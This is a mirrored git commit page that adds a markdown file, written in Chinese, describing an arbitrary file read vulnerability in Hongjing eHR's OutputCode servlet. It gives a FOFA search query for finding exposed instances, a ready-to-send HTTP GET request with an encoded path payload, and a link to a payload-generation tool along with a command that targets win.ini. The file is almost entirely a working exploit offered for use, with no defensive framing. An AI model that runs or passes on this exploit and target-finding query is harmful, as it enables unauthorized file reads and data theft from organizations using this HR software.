mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-28 21:15:35 +08:00
523更新漏洞
This commit is contained in:
35
宏景eHR-OutputCode存在任意文件读取漏洞.md
Normal file
35
宏景eHR-OutputCode存在任意文件读取漏洞.md
Normal file
@@ -0,0 +1,35 @@
|
||||
## 宏景eHR-OutputCode存在任意文件读取漏洞
|
||||
|
||||
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="HJSOFT-HCM"
|
||||
```
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
GET /servlet/OutputCode?path=MrEzLLE8pPjFvPfyPAATTP2HJFPAATTPTwqF7eJiXGeHU4B HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Connection: close
|
||||
```
|
||||
|
||||

|
||||
|
||||
|
||||
|
||||
payload生成工具
|
||||
|
||||
工具地址:https://github.com/vaycore/HrmsTool/releases/tag/0.1
|
||||
|
||||
```
|
||||
java -jar HrmsTool.jar -e c:/Windows/win.ini
|
||||
```
|
||||
|
||||

|
||||
Reference in New Issue
Block a user